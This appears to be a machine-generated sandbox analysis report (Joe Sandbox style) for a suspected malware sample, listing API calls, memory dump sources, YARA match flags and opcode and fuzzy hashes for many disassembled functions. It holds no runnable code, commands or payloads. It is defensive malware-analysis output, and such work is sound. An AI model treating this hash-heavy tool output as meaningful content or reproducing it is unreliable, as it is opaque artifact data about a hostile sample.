                                                              • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                              • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                              • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                              • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024A513D,00000000,00000000,00000000,00000000,?,024A53F5,00000006,0044A378), ref: 024A51C8
                                                              • GetLastError.KERNEL32(?,024A513D,00000000,00000000,00000000,00000000,?,024A53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024A2213), ref: 024A51D4
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024A513D,00000000,00000000,00000000,00000000,?,024A53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024A51E2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                              • Instruction ID: 0ce62b76c3fdf1b0970068b8dd50a63813749d5e11aeb4b2c24ffea2a9e3c617
                                                              • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                              • Instruction Fuzzy Hash: 52017036E022226BD7214F789D54E777B98AF56F617500231FC05D7241C720C901CAE4
                                                              APIs
                                                              • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                              • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                              • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                              • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                              • String ID:
                                                              • API String ID: 78362717-0
                                                              • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                              • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                              • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                              • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                              APIs
                                                              • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024963AF
                                                              • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024963C3
                                                              • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024963DB
                                                              • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024963F3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                              • String ID:
                                                              • API String ID: 78362717-0
                                                              • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                              • Instruction ID: d319f3877fd5d38c43cc6a368d3d55f140f1a849d9a8719ef83febf945162c43
                                                              • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                              • Instruction Fuzzy Hash: 7E018636600114BBCF26EEA5D854AAF7B9E9F45750F01005BEC21AB391DAB1ED11CAA0
                                                              APIs
                                                              • Concurrency::location::_Assign.LIBCMT ref: 02492BB1
                                                              • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02492BCF
                                                                • Part of subcall function 02488687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024886A8
                                                                • Part of subcall function 02488687: Hash.LIBCMT ref: 024886E8
                                                              • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02492BD8
                                                              • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02492BF8
                                                                • Part of subcall function 0248F6DF: Hash.LIBCMT ref: 0248F6F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                              • String ID:
                                                              • API String ID: 2250070497-0
                                                              • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                              • Instruction ID: 9818fd9ac03129c5d6a493833d4a97d73fd284c24edb29e5508bc53965df0ce4
                                                              • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                              • Instruction Fuzzy Hash: B8118E76410204AFCB15EF65C880ACAFBF9BF59320F014A5FE9568B551DBB0E904CBA0
                                                              APIs
                                                              • Concurrency::location::_Assign.LIBCMT ref: 02492BB1
                                                              • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02492BCF
                                                                • Part of subcall function 02488687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024886A8
                                                                • Part of subcall function 02488687: Hash.LIBCMT ref: 024886E8
                                                              • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02492BD8
                                                              • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02492BF8
                                                                • Part of subcall function 0248F6DF: Hash.LIBCMT ref: 0248F6F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                              • String ID:
                                                              • API String ID: 2250070497-0
                                                              • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                              • Instruction ID: 3ec0b07585b12f697fd9bc3453e88e054a5cfdc7649a1191d919e1ccde2fc13a
                                                              • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                              • Instruction Fuzzy Hash: 33012976410604ABCB24EF66C881EDAF7E9FF48320F008A1EE55A87650DBB0F944CF60
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                                • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                              • __Getcoll.LIBCPMT ref: 00405980
                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                              • String ID:
                                                              • API String ID: 1836011271-0
                                                              • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                              • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                              • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                              • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 024750D1
                                                                • Part of subcall function 0247BDAE: __EH_prolog3_GS.LIBCMT ref: 0247BDB5
                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 0247511C
                                                              • __Getcoll.LIBCPMT ref: 0247512B
                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0247513B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                              • String ID:
                                                              • API String ID: 1836011271-0
                                                              • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                              • Instruction ID: 241021b39ed5283bc16d49de6027d1b95f759a6a168da68b97e6a5a38c3c5984
                                                              • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                              • Instruction Fuzzy Hash: AA015371920208AFEB00EFA5C480BDDB7B1FF54316F50802ED465AB280CBB49988CF91
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 02475B8D
                                                                • Part of subcall function 0247BDAE: __EH_prolog3_GS.LIBCMT ref: 0247BDB5
                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 02475BD8
                                                              • __Getcoll.LIBCPMT ref: 02475BE7
                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02475BF7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                              • String ID:
                                                              • API String ID: 1836011271-0
                                                              • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                              • Instruction ID: 8d215c1775b953af9906a528ed44feb6b412121d06d2ac5772888c845cf6d0a3
                                                              • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                              • Instruction Fuzzy Hash: B00165719102089FDB00EFA5C480BEDB7B1BF14319F10842FD469AF280CBB89988CF90
                                                              APIs
                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Compare_exchange_acquire_4std::_
                                                              • String ID:
                                                              • API String ID: 3973403980-0
                                                              • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                              • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                              • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                              • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                              APIs
                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C170
                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C180
                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C190
                                                              • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0248C1A4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Compare_exchange_acquire_4std::_
                                                              • String ID:
                                                              • API String ID: 3973403980-0
                                                              • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                              • Instruction ID: 9637257fbe7917bdb9b89250c74eea444ac72701f57a4c3a519b253b9b5d5a35
                                                              • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                              • Instruction Fuzzy Hash: 1D01EF3A024109ABDF1BAE94DCC18BE3B66AB29650F088417F91884120D332C6B1AEA1
                                                              APIs
                                                              • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                                • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                                • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                              • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                              • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                              • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                              • String ID:
                                                              • API String ID: 4284812201-0
                                                              • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                              • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                              • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                              • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                              APIs
                                                              • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                                • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                                • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                              • GetLastError.KERNEL32 ref: 00413541
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                                • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                              • String ID:
                                                              • API String ID: 1674182817-0
                                                              • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                              • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                              • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                              • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
                                                              APIs
                                                              • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0248378C
                                                                • Part of subcall function 02482B16: ___crtGetTimeFormatEx.LIBCMT ref: 02482B2C
                                                                • Part of subcall function 02482B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02482B4B
                                                              • GetLastError.KERNEL32 ref: 024837A8
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024837BE
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 024837CC
                                                                • Part of subcall function 024828EC: SetThreadPriority.KERNEL32(?,?), ref: 024828F8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                              • String ID:
                                                              • API String ID: 1674182817-0
                                                              • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                              • Instruction ID: e51a998379e4b3c636d34c8559c38a4a408a90c82ab74436e28557c2a3370fe2
                                                              • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                              • Instruction Fuzzy Hash: 29F0A7B2A102153AE720FB769C06FBF3A9C9B01B51F50496BBD45E7181EED8D4048AB8
                                                              APIs
                                                              • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02481342
                                                                • Part of subcall function 02480BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02480BD6
                                                                • Part of subcall function 02480BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02480BF7
                                                              • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02481355
                                                              • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02481361
                                                              • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0248136A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                              • String ID:
                                                              • API String ID: 4284812201-0
                                                              • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                              • Instruction ID: d4842b68a2eb84245293d0a70945d3623d9e5558dd8407c15733678881363b1e
                                                              • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                              • Instruction Fuzzy Hash: 5EF0B431621704A7AF147EB608105BE31975F51324B04416FE52A9F380DEB59E069A94
                                                              APIs
                                                              • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0248D088
                                                              • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0248D0AC
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0248D0BF
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0248D0CD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                              • String ID:
                                                              • API String ID: 3657713681-0
                                                              • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                              • Instruction ID: 94217204aee43c245b57ddc909e2e4abb0a71c09cbc103126ec9398bb114652a
                                                              • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                              • Instruction Fuzzy Hash: 41F05931E11204E3C724FB66D840C9EB37A8E92B18770856FD805172C5DB31A94ACE62
                                                              APIs
                                                              • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                              • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                              • String ID:
                                                              • API String ID: 3803302727-0
                                                              • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                              • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                              • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                              • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                              APIs
                                                              • std::_Cnd_initX.LIBCPMT ref: 02475A83
                                                              • __Cnd_signal.LIBCPMT ref: 02475A8F
                                                              • std::_Cnd_initX.LIBCPMT ref: 02475AA4
                                                              • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02475AAB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                              • String ID:
                                                              • API String ID: 2059591211-0
                                                              • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                              • Instruction ID: 1d93e98a7279ee29cd4f44be268100be2dcdc93a5e947aa8c804c8063abbf2d6
                                                              • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                              • Instruction Fuzzy Hash: 6FF0EC71410700DFEB317773D8057DA73A6AF01328F14451FD0795A990CFB5E8145E55
                                                              APIs
                                                              • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0248286F
                                                              • GetLastError.KERNEL32(?,?,?,?,02488830,?,?,?,?,00000000,?,00000000), ref: 0248287E
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482894
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 024828A2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                              • String ID:
                                                              • API String ID: 3803302727-0
                                                              • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                              • Instruction ID: 70a05af022c638a1edb475b4b130ff98d0fbfffb5b6052c80cb2eb65102ab050
                                                              • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                              • Instruction Fuzzy Hash: 45F0303550014ABBCF10FFA5CD45EAF37B86B00751F600656B915E61A0DB75D6049B64
                                                              APIs
                                                              • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                              • String ID:
                                                              • API String ID: 200240550-0
                                                              • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                              • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                              • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                              • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                              APIs
                                                              • ___crtCreateEventExW.LIBCPMT ref: 02482593
                                                              • GetLastError.KERNEL32(?,?,?,?,?,02480DA0), ref: 024825A1
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024825B7
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 024825C5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                              • String ID:
                                                              • API String ID: 200240550-0
                                                              • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                              • Instruction ID: 452940a9c2cbff8c27988d2a34783926729a1d1a02ba9c90c1676f6da1e7dfaf
                                                              • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                              • Instruction Fuzzy Hash: 78E0D87165025539E710F77A4C12F7F36DC5B00B41F440956BD15E11C1FFD4D10049B8
                                                              APIs
                                                                • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                              • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                              • GetLastError.KERNEL32 ref: 00423991
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                              • String ID:
                                                              • API String ID: 3735082963-0
                                                              • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
